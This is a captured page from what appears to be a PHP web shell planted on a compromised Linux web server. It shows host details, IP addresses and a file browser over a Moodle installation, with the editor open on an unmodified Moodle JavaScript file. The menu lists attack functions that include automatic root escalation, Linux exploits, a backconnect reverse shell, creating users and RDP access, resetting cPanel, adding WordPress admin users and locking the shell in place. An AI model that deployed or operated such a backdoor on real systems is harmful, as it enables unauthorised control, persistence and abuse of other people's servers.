Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.135.84
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
form /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
defaultcustom.min.js
1.34
KB
-rw-r--r--
defaultcustom.min.js.map
3.48
KB
-rw-r--r--
events.min.js
1.63
KB
-rw-r--r--
events.min.js.map
4.01
KB
-rw-r--r--
filetypes.min.js
5.34
KB
-rw-r--r--
filetypes.min.js.map
15.49
KB
-rw-r--r--
passwordunmask.min.js
4.27
KB
-rw-r--r--
passwordunmask.min.js.map
13.71
KB
-rw-r--r--
showadvanced.min.js
3.75
KB
-rw-r--r--
showadvanced.min.js.map
10.95
KB
-rw-r--r--
submit.min.js
2.17
KB
-rw-r--r--
submit.min.js.map
7.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : submit.min.js
define("core_form/submit",["exports","core_form/events"],(function(_exports,_events){Object.defineProperty(_exports,"__esModule",{value:!0}),_exports.init=void 0; /** * Submit button JavaScript. All submit buttons will be automatically disabled once the form is * submitted, unless that submission results in an error/cancelling the submit. * * @module core_form/submit * @copyright 2019 The Open University * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later * @since 3.8 */ var cookieListener=0,cookieListeningButtons=[],currentUploadCount=0,uploadListeningButtons=[],uploadListenersRegistered=!1,getCookieName=function(){return"moodledownload_"+M.cfg.sesskey},clearDownloadCookie=function(){document.cookie=encodeURIComponent(getCookieName())+"=deleted; expires="+new Date(0).toUTCString()},checkUploadCount=function(){currentUploadCount?uploadListeningButtons.forEach((function(button){button.disabled=!0})):uploadListeningButtons.forEach((function(button){button.disabled=!1}))};_exports.init=function(elementId){var button=document.getElementById(elementId);button.disabled||uploadListeningButtons.push(button),uploadListenersRegistered||(document.addEventListener(_events.types.uploadStarted,(function(e){window.console.log(e.target),currentUploadCount++,checkUploadCount()})),document.addEventListener(_events.types.uploadCompleted,(function(e){window.console.log(e.target),currentUploadCount--,checkUploadCount()})),uploadListenersRegistered=!0),"off"!==button.form.dataset.doubleSubmitProtection&&button.form.addEventListener("submit",(function(event){var disableAction=function(){event.defaultPrevented||button.disabled||(button.disabled=!0,clearDownloadCookie(),function(button){cookieListeningButtons.push(button),cookieListener||(cookieListener=setInterval((function(){2==document.cookie.split(getCookieName()+"=").length&&(clearDownloadCookie(),clearInterval(cookieListener),cookieListener=0,cookieListeningButtons.forEach((function(button){button.disabled=!1})))}),500))}(button))};window.addEventListener("beforeunload",disableAction),setTimeout((function(){window.removeEventListener("beforeunload",disableAction)}),0)}),!1)}})); //# sourceMappingURL=submit.min.js.map
Close